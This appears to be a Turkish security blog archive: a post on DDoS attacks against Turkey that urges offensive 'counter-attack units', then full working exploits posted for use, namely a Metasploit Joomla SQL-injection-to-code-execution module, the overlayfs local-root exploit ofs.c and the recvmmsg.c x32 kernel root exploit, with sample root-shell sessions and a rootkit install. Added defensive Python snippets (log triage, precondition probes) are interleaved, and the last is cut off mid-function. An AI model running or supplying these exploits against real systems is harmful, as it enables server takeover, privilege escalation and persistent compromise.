Archive for Genel

DDOS ATTACKS

ON DDOS ATTACKS

Over the past month, the DDoS attacks against our country have shown that our security measures are quite inadequate. As a temporary measure the easy way out was taken: access from foreign IP addresses was blocked, and the ".tr" extension lost prestige. DDoS attacks on bank systems caused disruptions in internet banking.

WEB-BASED DDOS ATTACKS

Off-the-shelf scripts are in very wide use, WordPress, Joomla, Drupal, phpBB and vBulletin foremost among them. Over the years a great many security vulnerabilities in these scripts and their plugins have been published on security sites; attackers have exploited them to upload shells, DDoS tools, viruses, root exploits, rootkits and the like to servers, and have used those servers for their own ends. They still do.

As soon as such widespread vulnerabilities are found or published, the internet is scanned for them and, by exploiting them, DDoS exploits or remotely callable code are planted in some directory on thousands of servers.

When the time comes, those servers are contacted and given the commands to launch a DDoS attack on the target site. Attacks from web servers grow more effective in proportion to the number of servers: web servers are online 24/7 and their bandwidth is far higher than a personal computer's. In 2011, over the Armenian resolution, and in other attacks since, iskorpitx used this technique; the target sites went down quickly, then had to tighten their security and increase their bandwidth enormously.

Malware planted on a server can be noticed and removed by the server's operators or by antivirus software, and the hosting staff of the attacked site can work out which IP addresses the attack is coming from and get the malware removed by sending an abuse report to the source server's operator.

In principle, web-based DDoS is not very different from botnet-style DDoS launched from tens of thousands of previously infected personal PCs. In bandwidth terms, an attack from thousands of web servers is considerably stronger.

While this kind of DDoS attack was little known in Turkey, in 2004, 2005 and 2006 iskorpitx, working by trial and error, used it against Turkish hacking-related and illegal sites with very effective results.

In recent years effective countermeasures against DDoS attacks have been put in place with software, hardware or services such as https://www.cloudflare.com/ddos/.

For a DDoS attack to be effective, its volume must exceed the target server's bandwidth capacity.

The recent 40 Gbit/s attack on Nic.tr is not a particularly large attack by volume. Against attacks of this kind from outside, setting up counter-attack units is a necessity. Sometimes the best defense is offense; the existence of counter-defense units would certainly have a deterrent effect.

Siyami Özkan

Joomla Content History SQLi Remote Code Execution

Metasploit exploit module for the Joomla Content History remote SQL injection; Joomla 3.2 through 3.4.4 are affected.


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Joomla Content History SQLi Remote Code Execution",
      'Description'    => %q{
        This module exploits a SQL injection vulnerability found in Joomla versions
        3.2 up to 3.4.4. The vulnerability exists in the Content History administrator
        component in the core of Joomla. Triggering the SQL injection makes it possible
        to retrieve active Super User sessions. The cookie can be used to login to the
        Joomla administrator backend. By creating a new template file containing our
        payload, remote code execution is made possible.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Asaf Orpani', # Vulnerability discovery
          'xistence <xistence[at]0x90.nl>' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2015-7857' ], # Admin session hijacking
          [ 'CVE', '2015-7297' ], # SQLi
          [ 'CVE', '2015-7857' ], # SQLi
          [ 'CVE', '2015-7858' ], # SQLi
          [ 'URL', 'https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/' ],
          [ 'URL', 'http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html' ]
        ],
      'Payload'        =>
        {
          'DisableNops' => true,
          # Arbitrary big number. The payload gets sent as POST data, so
          # really it's unlimited
          'Space'       => 262144, # 256k
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Joomla 3.x <= 3.4.4', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Oct 23 2015",
      'DefaultTarget'  => 0))
 
      register_options(
        [
          OptString.new('TARGETURI', [true, 'The base path to Joomla', '/'])
        ], self.class)
 
  end
 
  def check
 
    # Request using a non-existing table
    res = sqli(rand_text_alphanumeric(rand(10)+6))
 
    if res && res.body =~ /`(.*)_ucm_history`/
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
 
  end
 
 
  def sqli( tableprefix )
 
    # SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in).
    # The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history.
    # This way we make sure that's excluded and we only get real admin sessions.
 
    sql = " (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM #{tableprefix}session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)"
 
    # Retrieve cookies
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "index.php"),
      'vars_get' => {
        'option' => 'com_contenthistory',
        'view' => 'history',
        'list[ordering]' => '',
        'item_id' => '1',
        'type_id' => '1',
        'list[select]' => sql
        }
      })
 
    return res
 
  end
 
 
  def exploit
 
    # Request using a non-existing table first, to retrieve the table prefix
    res = sqli(rand_text_alphanumeric(rand(10)+6))
 
    if res && res.code == 500 && res.body =~ /`(.*)_ucm_history`/
      table_prefix = $1
      print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]")
    else
      fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix")
    end
 
    # Retrieve the admin session using our retrieved table prefix
    res = sqli("#{table_prefix}_")
 
    if res && res.code == 500 && res.body =~ /Duplicate entry &#039;([a-z0-9]+)&#039; for key/
      auth_cookie_part = $1[0...-1]
      print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]")
    else
      fail_with(Failure::Unknown, "#{peer}: No logged-in admin user found!")
    end
 
    # Retrieve cookies
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php")
    })
 
    if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/
      cookie_begin = $1
      print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]")
    else
      fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie")
    end
 
    # Modify cookie to authenticated admin
    auth_cookie = cookie_begin
    auth_cookie << "="
    auth_cookie << auth_cookie_part
    auth_cookie << ";"

    # Authenticated session
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
      'cookie'  => auth_cookie
      })
 
    if res && res.code == 200 && res.body =~ /Administration - Control Panel/
      print_status("#{peer} - Successfully authenticated as Administrator")
    else
      fail_with(Failure::Unknown, "#{peer} - Session failure")
    end
 
 
    # Retrieve template view
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
      'cookie'  => auth_cookie,
      'vars_get' => {
        'option' => 'com_templates',
        'view' => 'templates'
        }
      })
 
    # We try to retrieve and store the first template found
    if res && res.code == 200 && res.body =~ /\/administrator\/index.php\?option=com_templates&view=template&id=([0-9]+)&file=([a-zA-Z0-9=]+)/
      template_id = $1
      file_id = $2
    else
      fail_with(Failure::Unknown, "Unable to retrieve template")
    end
 
    filename = rand_text_alphanumeric(rand(10)+6)
 
    # Create file
    print_status("#{peer} - Creating file [ #{filename}.php ]")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
      'cookie'  => auth_cookie,
      'vars_get' => {
        'option' => 'com_templates',
        'task' => 'template.createFile',
        'id' => template_id,
        'file' => file_id,
        },
      'vars_post' => {
        'type' => 'php',
        'name' => filename
      }
      })
 
    # Grab token
    if res && res.code == 303 && res.headers['Location']
      location = res.headers['Location']
      print_status("#{peer} - Following redirect to [ #{location} ]")
      res = send_request_cgi(
        'uri'    => location,
        'method' => 'GET',
        'cookie' => auth_cookie
      )
 
      # Retrieving template token
      if res && res.code == 200 && res.body =~ /&([a-z0-9]+)=1\">/
        token = $1
        print_status("#{peer} - Token [ #{token} ] retrieved")
      else
        fail_with(Failure::Unknown, "#{peer} - Retrieving token failed")
      end
 
      if res && res.code == 200 && res.body =~ /(\/templates\/.*\/)template_preview.png/
        template_path = $1
        print_status("#{peer} - Template path [ #{template_path} ] retrieved")
      else
        fail_with(Failure::Unknown, "#{peer} - Unable to retrieve template path")
      end
 
    else
      fail_with(Failure::Unknown, "#{peer} - Creating file failed")
    end
 
    filename_base64 = Rex::Text.encode_base64("/#{filename}.php")
 
    # Inject payload data into file
    print_status("#{peer} - Insert payload into file [ #{filename}.php ]")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
      'cookie'  => auth_cookie,
      'vars_get' => {
        'option' => 'com_templates',
        'view' => 'template',
        'id' => template_id,
        'file' => filename_base64,
        },
      'vars_post' => {
        'jform' => payload.encoded,
        'task' => 'template.apply',
        token => '1',
        'jform[extension_id]' => template_id,
        'jform[filename]' => "/#{filename}.php"
      }
      })
 
    if res && res.code == 303 && res.headers['Location'] =~ /\/administrator\/index.php\?option=com_templates&view=template&id=#{template_id}&file=/
      print_status("#{peer} - Payload data inserted into [ #{filename}.php ]")
    else
      fail_with(Failure::Unknown, "#{peer} - Could not insert payload into file [ #{filename}.php ]")
    end
 
    # Request payload
    register_files_for_cleanup("#{filename}.php")
    print_status("#{peer} - Executing payload")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, template_path, "#{filename}.php"),
      'cookie'  => auth_cookie
    })
 
  end
 
end
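Access-log triage for two things described on this page: the DDoS post above notes that hosting staff have to work out which source IPs a flood is coming from before they can file an abuse report, and the module above drives its SQL through the list[select] parameter of com_contenthistory, which the web server sees in plain GET requests. The following is an added example, not code from this page or from Metasploit: it parses combined-format access-log lines, flags requests that carry SQL in that parameter, and ranks sources by requests per minute. The log lines, the addresses and the jos_ table prefix are constructed for the example.

```python
"""Access-log triage: CVE-2015-7857 (Joomla com_contenthistory) probes and
per-source request floods. Added example, not code from the original page."""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Combined-format line: ip ident user [time] "method uri proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# list[select] is meant to carry column names. SQL keywords or parentheses in
# it are exactly what the error-based extraction in the module relies on.
SQL_TOKENS = re.compile(
    r'\b(select|union|concat|from|information_schema|rand|floor)\b|\(', re.I
)

# Constructed sample traffic (not real): one injection probe answered with a
# 500 (the error-based oracle), one normal request to the same component.
SAMPLE_LOG = (
    '203.0.113.7 - - [23/Oct/2015:10:01:02 +0300] "GET /index.php?option='
    'com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1'
    '&list[select]=%28select+1+FROM%28select+count%28%2A%29%2Cconcat%28%28'
    'select+session_id+FROM+jos_session+LIMIT+0%2C1%29%2Cfloor%28rand%280'
    '%29%2A2%29%29x+FROM+information_schema.tables+GROUP+BY+x%29a%29 '
    'HTTP/1.1" 500 2310 "-" "Mozilla/5.0"\n'
    '198.51.100.9 - - [23/Oct/2015:10:01:03 +0300] "GET /index.php?option='
    'com_contenthistory&view=history&item_id=1&type_id=1 HTTP/1.1" 200 '
    '8120 "-" "Mozilla/5.0"\n'
)


def parse_line(line):
    """Dict of the fields above, or None for lines that are not access logs."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def contenthistory_sqli(line):
    """Return {'ip', 'status', 'select'} when the request carries SQL in
    list[select] of com_contenthistory, else None."""
    rec = parse_line(line)
    if rec is None:
        return None
    qs = parse_qs(urlsplit(rec['uri']).query, keep_blank_values=True)
    if qs.get('option') != ['com_contenthistory']:
        return None
    select = qs.get('list[select]', [''])[0]  # parse_qs already URL-decodes
    if not SQL_TOKENS.search(select):
        return None
    return {'ip': rec['ip'], 'status': int(rec['status']), 'select': select}


def flood_sources(lines, per_minute_threshold):
    """Requests per (source IP, minute). Returns {ip: (minute, count)} for
    every source whose busiest minute exceeds the threshold; those are the
    addresses that go into the abuse report."""
    counts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec:
            minute = rec['ts'].split(' ')[0].rsplit(':', 1)[0]
            counts[(rec['ip'], minute)] += 1
    hits = {}
    for (ip, minute), n in counts.items():
        if n > per_minute_threshold and n > hits.get(ip, ('', 0))[1]:
            hits[ip] = (minute, n)
    return hits


def constructed_flood(ip='192.0.2.55', n=300):
    """Constructed sample: n requests from one address inside one minute."""
    return [
        f'{ip} - - [23/Oct/2015:10:05:{i % 60:02d} +0300] '
        f'"GET / HTTP/1.1" 200 512 "-" "-"'
        for i in range(n)
    ]


if __name__ == '__main__':
    lines = SAMPLE_LOG.splitlines() + constructed_flood()
    for line in lines:
        hit = contenthistory_sqli(line)
        if hit:
            print('SQLi probe from', hit['ip'], 'status', hit['status'])
    print('flood sources:', flood_sources(lines, per_minute_threshold=120))
```

A 500 on a flagged request is the oracle the module's check relies on: it reads the table prefix out of the error page. The per-minute threshold is a tuning knob for the site's normal traffic, not a universal constant, and a flood spread over many sources (the web-server botnet the DDoS post describes) will show up as many moderate entries rather than one large one.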

Ubuntu 12.04, 14.04, 14.10, 15.04 – overlayfs Local Root (Shell)

The code for the Ubuntu 12.04, 14.04, 14.10, 15.04 – overlayfs Local Root (Shell) vulnerability is below.

/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328     (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)
 
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT
 
user-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user-server-1504:~$ gcc ofs.c -o ofs
user-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)
 
greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/
 
/* Duplicated includes from the original collapsed; _GNU_SOURCE and
   <sys/wait.h> added so unshare(), clone() and waitpid() have prototypes
   on toolchains that reject implicit declarations. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/wait.h>
 
/* Source of the preload library: a getuid() hook that, once su has loaded it
   as root, removes its traces and execs a root shell. <dlfcn.h> and
   <string.h> added so it builds where implicit declarations are an error. */
#define LIB "#define _GNU_SOURCE\n#include <unistd.h>\n#include <dlfcn.h>\n#include <string.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"
 
static char child_stack[1024*1024];
 
static int
child_exec(void *stuff)
{
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);
 
    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";
 
    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");
 
    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }
 
    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
    return 0;
}
 
int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;
 
    fprintf(stderr,"spawning threads\n");
 
    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");
 
        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }
 
            waitpid(pid, &status, 0);
 
        }
 
        waitpid(init, &status, 0);
        return 0;
    }
 
    usleep(300000);
 
    wait(NULL);
 
    fprintf(stderr,"child threads done\n");
 
    fd = open("/etc/ld.so.preload",O_WRONLY);
 
    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }
 
    fprintf(stderr,"/etc/ld.so.preload created\n");
    fprintf(stderr,"creating shared library\n");
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
        fprintf(stderr,"couldn't create dynamic library\n");
        exit(-1);
    }
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
}
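The exploit above needs three things: an unprivileged process must be allowed into a new user namespace, overlayfs must be available, and the kernel must let that namespace mount it with an upperdir it does not own (the FS_USERNS_MOUNT behaviour named in the header comment, which is what the exploit's first mount() tests). The following added example, not part of the original exploit, probes the first two from Python without mounting anything, so it reports preconditions rather than proof of vulnerability. The kernel.unprivileged_userns_clone sysctl is the Debian/Ubuntu kernel knob; it is assumed absent on kernels without that patch.

```python
"""Precondition checks for CVE-2015-1328 (ofs.c above).
Added example, not part of the original exploit."""
import ctypes
import os
import sys

CLONE_NEWUSER = 0x10000000  # <linux/sched.h>


def unprivileged_userns_allowed():
    """True if unshare(CLONE_NEWUSER) succeeds with this process's privileges.
    Tried in a forked child so the caller keeps its own namespaces. A
    kernel.unprivileged_userns_clone=0 sysctl, a seccomp filter or a
    user.max_user_namespaces=0 limit all come back as False here."""
    if not sys.platform.startswith('linux'):
        return False
    libc = ctypes.CDLL(None, use_errno=True)
    pid = os.fork()
    if pid == 0:  # child: attempt it, report through the exit status
        try:
            rc = libc.unshare(CLONE_NEWUSER)
        except Exception:
            rc = -1
        os._exit(0 if rc == 0 else 1)
    _, status = os.waitpid(pid, 0)
    return os.WIFEXITED(status) and os.WEXITSTATUS(status) == 0


def overlay_registered():
    """True if the running kernel lists overlay or overlayfs in
    /proc/filesystems (built in, or already loaded as a module)."""
    try:
        with open('/proc/filesystems') as fh:
            names = {line.split()[-1] for line in fh if line.strip()}
    except OSError:
        return False
    return bool(names & {'overlay', 'overlayfs'})


def userns_clone_sysctl():
    """Value of kernel.unprivileged_userns_clone, or None when the file does
    not exist (assumption: absence means the kernel lacks that knob)."""
    try:
        with open('/proc/sys/kernel/unprivileged_userns_clone') as fh:
            return int(fh.read().strip())
    except (OSError, ValueError):
        return None


def precondition_report():
    """Both preconditions together; 'worth_checking' is True only when an
    unprivileged user namespace and overlayfs are both available."""
    report = {
        'userns_unprivileged': unprivileged_userns_allowed(),
        'overlay_registered': overlay_registered(),
        'userns_clone_sysctl': userns_clone_sysctl(),
    }
    report['worth_checking'] = (report['userns_unprivileged']
                                and report['overlay_registered'])
    return report


if __name__ == '__main__':
    for key, value in precondition_report().items():
        print(f'{key}: {value}')
```

Setting the sysctl to 0 (where it exists) closes the namespace half of the chain for every unprivileged user; it is the mitigation a host can apply before the kernel update, at the cost of breaking software that relies on unprivileged user namespaces.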

Ubuntu Local Root Exploit


With this Linux 3.4+ local root exploit (CONFIG_X86_X32=y), root privileges can be obtained on Ubuntu by a local user. The uncompiled exploit source for the vulnerability is below.

/*
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)
CVE-2014-0038 / x32 ABI with recvmmsg
by 
-----------------------------------

takes about 13 minutes to run because timeout->tv_sec is decremented
once per second and 0xff*3 is 765.

some things you could do while waiting:
  * watch ?v=OPyZGCKu2wg 3 times
  * read https://wiki.ubuntu.com/Security/Features and smirk a few times
  * brew some coffee
  * stare at the countdown giggly with anticipation

could probably whack the high bits of some pointer with nanoseconds,
but that would require a bunch of nulls before the pointer and then
reading an oops from dmesg which isn't that elegant.

&net_sysctl_root.permissions is nice because it has 16 trailing nullbytes

hardcoded offsets because I only saw this on ubuntu & kallsyms is protected
anyway..

same principle will work on 32bit but I didn't really find any major
distros shipping with CONFIG_X86_X32=y

user:~$ uname -a
Linux ubuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
user:~$ gcc recvmmsg.c -o recvmmsg
user:~$ ./recvmmsg
byte 3 / 3.. ~0 secs left.
w00p w00p!
# id
uid=0(root) gid=0(root) groups=0(root)
# sh phalanx-2.6b-x86_64.sh
unpacking..

:)=

greets to my homeboys kaliman, beist, capsl & all of #social

Sat Feb  1 22:15:19 CET 2014
% rebel %
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/

#define _GNU_SOURCE
#include <netinet/ip.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/utsname.h>
#include <time.h>   /* added: time() for srand() below */

#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
#define VLEN 1
#define BUFSIZE 200

int port;

struct offset {
    char *kernel_version;
    unsigned long dest; // net_sysctl_root + 96
    unsigned long original_value; // net_ctl_permissions
    unsigned long prepare_kernel_cred;
    unsigned long commit_creds;
};

struct offset offsets[] = {
    {"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10
    {"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10
    {"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04
    {NULL,0,0,0,0}
};

void udp(int b) {
    int sockfd;
    struct sockaddr_in servaddr,cliaddr;
    int s = 0xff+1;

    if(fork() == 0) {
        while(s > 0) {
            fprintf(stderr,"\rbyte %d / 3.. ~%d secs left    \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
            sleep(1);
            s--;
            fprintf(stderr,".");
        }

        sockfd = socket(AF_INET,SOCK_DGRAM,0);
        bzero(&servaddr,sizeof(servaddr));
        servaddr.sin_family = AF_INET;
        servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);
        servaddr.sin_port=htons(port);
        sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
        exit(0);
    }

}

void trigger() {
    open("/proc/sys/net/core/somaxconn",O_RDONLY);

    if(getuid() != 0) {
        fprintf(stderr,"not root, ya blew it!\n");
        exit(-1);
    }

    fprintf(stderr,"w00p w00p!\n");
    system("/bin/sh -i");
}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

// thx bliss
static int __attribute__((regparm(3)))
getroot(void *head, void * table)
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

void __attribute__((regparm(3)))
trampoline()
{
    asm("mov $getroot, %rax; call *%rax;");
}

int main(void)
{
    int sockfd, retval, i;
    struct sockaddr_in sa;
    struct mmsghdr msgs[VLEN];
    struct iovec iovecs[VLEN];
    char buf[BUFSIZE];
    long mmapped;
    struct utsname u;
    struct offset *off = NULL;

    uname(&u);

    for(i=0;offsets[i].kernel_version != NULL;i++) {
        if(!strcmp(offsets[i].kernel_version,u.release)) {
            off = &offsets[i];
            break;
        }
    }

    if(!off) {
        fprintf(stderr,"no offsets for this kernel version..\n");
        exit(-1);
    }

    mmapped = (off->original_value  & ~(sysconf(_SC_PAGE_SIZE) - 1));
    mmapped &= 0x000000ffffffffff;

    srand(time(NULL));
    port = (rand() % 30000)+1500;

    commit_creds = (_commit_creds)off->commit_creds;
    prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;

    mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);

    if(mmapped == -1) {
        perror("mmap()");
        exit(-1);
    }

    memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);

    memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);

    if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {
        perror("mprotect()");
        exit(-1);
    }

    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd == -1) {
        perror("socket()");
        exit(-1);
    }

    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = htons(port);

    if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
        perror("bind()");
        exit(-1);
    }

    memset(msgs, 0, sizeof(msgs));

    iovecs[0].iov_base = &buf;
    iovecs[0].iov_len = BUFSIZE;
    msgs[0].msg_hdr.msg_iov = &iovecs[0];
    msgs[0].msg_hdr.msg_iovlen = 1;

    for(i=0;i < 3 ;i++) {
        udp(i);
        retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
        if(!retval) {
            fprintf(stderr,"\nrecvmmsg() failed\n");
        }
    }

    close(sockfd);

    fprintf(stderr,"\n");

    trigger();
}
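The path recvmmsg.c takes into the kernel is the x32 ABI, selected by setting bit 30 (0x40000000) of the syscall number, as the exploit's own __NR_recvmmsg define shows; a kernel built without CONFIG_X86_X32 does not expose that path at all. The following added example, not part of the exploit, checks whether the running kernel services x32-flagged syscalls by issuing a harmless getpid through that entry and comparing it with the native one. It assumes glibc's syscall(2) wrapper is reachable via ctypes; the probe runs in a forked child because a sandbox's seccomp policy may answer an unknown ABI with an errno or by killing the caller, and either has to count as "not usable" rather than crash the script.

```python
"""x32 ABI probe for the surface CVE-2014-0038 (recvmmsg.c above) uses.
Added example, not part of the original exploit."""
import ctypes
import errno
import os
import platform
import sys

X32_SYSCALL_BIT = 0x40000000
NR_GETPID = 39  # same number in the x86_64 and x32 tables


def on_x86_64_linux():
    return sys.platform.startswith('linux') and platform.machine() == 'x86_64'


def _syscall(number):
    """Raw syscall via glibc's wrapper; returns (result, errno)."""
    libc = ctypes.CDLL(None, use_errno=True)
    libc.syscall.restype = ctypes.c_long
    res = libc.syscall(ctypes.c_long(number))
    return res, (ctypes.get_errno() if res == -1 else 0)


def native_getpid_matches():
    """Sanity check of the probe path: native getpid must equal os.getpid()."""
    if not on_x86_64_linux():
        return False
    res, _ = _syscall(NR_GETPID)
    return res == os.getpid()


def x32_probe():
    """(enabled, detail). enabled is True when the kernel services an
    x32-flagged syscall; a kernel without CONFIG_X86_X32 (or, on newer
    kernels, booted with syscall.x32=n) answers ENOSYS, a seccomp policy may
    answer EPERM or kill the caller. The child reports via its exit code."""
    if not on_x86_64_linux():
        return False, 'not x86_64 Linux'
    pid = os.fork()
    if pid == 0:
        try:
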